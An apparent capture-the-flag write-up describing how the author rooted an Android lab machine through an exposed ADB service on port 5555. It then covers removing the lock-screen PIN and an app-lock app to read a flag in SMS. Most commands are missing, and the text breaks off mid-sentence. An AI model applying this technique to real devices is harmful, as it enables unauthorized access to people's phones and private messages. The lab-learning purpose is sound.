Hi all, firstly i didnt want to try this box because i have no idea how to pentest/hack an android box. In real life i don’t even use/have a smart phone but then i say to myself it’s a great way to learn something new, so let’s pwn it!
You can find the machine there > Investigator
Let’s start always with nmap.
5555 seems suspicious, i did some research on it and i found a way to exploit it. :)
5555 == adb service, adb (Android Debug Bridge) can control your device over USB or wireless by enabling a daemon server at port 5555.
sudo apt-get install adb
Exploiting adb service
Now let’s exploit it, first we need to connect on target:
Now let’s spawn a shell:
Bingo! That simple, we can even simplier take a root shell:
Now because i have no idea how android file system is working, i decided to search for the root directory:
We can see a
Removing PIN - finding the real flag
Here i stuck, i was searching for the flag for loooot of hours & then i deleted the box i said OK i got root shell i can’t find the real flag. Today i had a chat with a friend on this box and we both stuck finding the real flag, i told him that you can remove the pin using adb shell. After some minutes he found the real flag! Shout out to @Freakazoid without him i wasn’t able to gain the real flag! :D
Now as you can see, the android box asks for a PIN:
We can remove this using our root shell, simply do this:
& reboot the box, now we can see there is no PIN:
If we go to open an app asks for a pattern:
Probably there is an app in background, that locks the other apps, let’s search for it and remove it:
com.martianmode.applock seems interesting, let’s remove it:
Now we can see the real flag in messages:
I learnt some new stuff, fux box :)
Update - Reading sms without physical access
There is a way to read sms (flag) without doing all these stuff ^ by accessing the